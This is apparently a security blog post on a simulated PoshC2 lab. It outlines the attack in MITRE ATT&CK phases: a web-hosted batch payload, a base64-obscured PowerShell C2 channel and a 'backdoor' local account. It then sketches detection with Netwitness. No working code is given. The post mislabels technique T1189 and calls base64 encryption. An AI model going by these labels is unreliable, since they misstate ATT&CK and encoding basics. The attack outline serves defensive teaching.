a week ago
Introduction:
PoshC2, a powerful post-exploitation framework, has become a popular tool for adversaries to maintain persistence and execute various malicious activities within compromised networks. This blog post will delve into a simulated PoshC2 attack that traverses multiple MITRE ATT&CK tactics, from payload creation to establishing persistence. We will then explore how a Security Operations Center (SOC) analyst can effectively detect and mitigate such threats using Netwitness, leveraging its advanced capabilities in log analysis, Endpoint Detection and Response (EDR), and Network Detection and Response (NDR).
Attack Scenario:
This blog post will examine a real-world scenario where a Security Operations Center (SOC) was alerted to suspicious encrypted traffic originating from an agent host and an unknown malicious IP address. Upon further investigation, it became evident that the host had already been compromised by a Command and Control (C2) attack. We will explore how Netwitness, with its advanced log analysis, Endpoint Detection and Response (EDR), and Network Detection and Response (NDR) capabilities, played a crucial role in detecting and mitigating this threat.
Red Team Tools:
Blue Team Tools:
Link for resources:
Additional Considerations:
It is important to emphasize that this blog post is intended for educational purposes only. Any actions described in this post should not be attempted on unauthorized systems. Always adhere to ethical and legal guidelines when conducting security investigations.
The Attack:
Red Team Activity:
Resource Development
T1588.002: Obtain Capabilities: Tool
In this phase of the PoshC2 attack, the adversary focuses on acquiring the necessary tools and resources to establish and maintain persistence within the compromised environment. This aligns with the MITRE ATT&CK technique T1588.002.
A custom payload was crafted to connect to the attacker's machine via an encrypted HTTPS channel. PoshC2 offers a versatile range of payload options, including batch files, HTA files, and raw PowerShell commands, allowing attackers to select the most suitable delivery method based on the target environment and desired level of stealth.
For this lab, we utilized a batch file payload (payload.bat) as a representative example. The batch file contains the necessary instructions to establish the initial connection with the attacker's command and control server and execute subsequent malicious actions.
Delivery
T1189: Exploit Public-Facing Application: Web Server
The next phase of the attack involves delivering the malicious payload to the target system. This aligns with the MITRE ATT&CK technique T1189.
A straightforward delivery method was employed in this scenario. A web server was configured to host the payloads created in the previous step, making them accessible to potential victims. The attacker would then wait for unsuspecting users to visit the malicious website and download the infected file. This technique leverages the widespread use of web servers and the trust that users often place in online content to trick victims into executing malicious code.
The batch file immediately launches a PowerShell script that establishes communication with the attacker's machine. This communication channel is encrypted using base64 encoding to obfuscate the malicious activity and evade detection by security systems. The PowerShell script acts as a bridge between the compromised victim machine and the attacker's command and control server, enabling the adversary to remotely execute commands and maintain persistence.
Persistence
T1136.001: Create Accounts
To maintain long-term access to the compromised system, the attacker establishes persistence. This aligns with the MITRE ATT&CK technique T1136.001.
A local account named "backdoor" is created on the infected host. This account provides the attacker with a privileged backdoor into the system, allowing them to bypass authentication mechanisms and execute malicious commands even after the initial infection vector has been removed. The persistence mechanism ensures that the attacker can regain control of the compromised system at any time, making it difficult to eradicate the threat.
Detection:
NDR
Analyzing NDR to check the web traffic as we can learn more about the source of this payload.bat.
EDR
Attack timeline:
Conclusion:
This case study demonstrates the effectiveness of utilizing multiple data sources for comprehensive threat investigation and confirmation. By combining log analysis, EDR, and NDR capabilities within Netwitness, security teams can gain a deeper understanding of malicious activities and respond more effectively to incidents like PoshC2 attacks.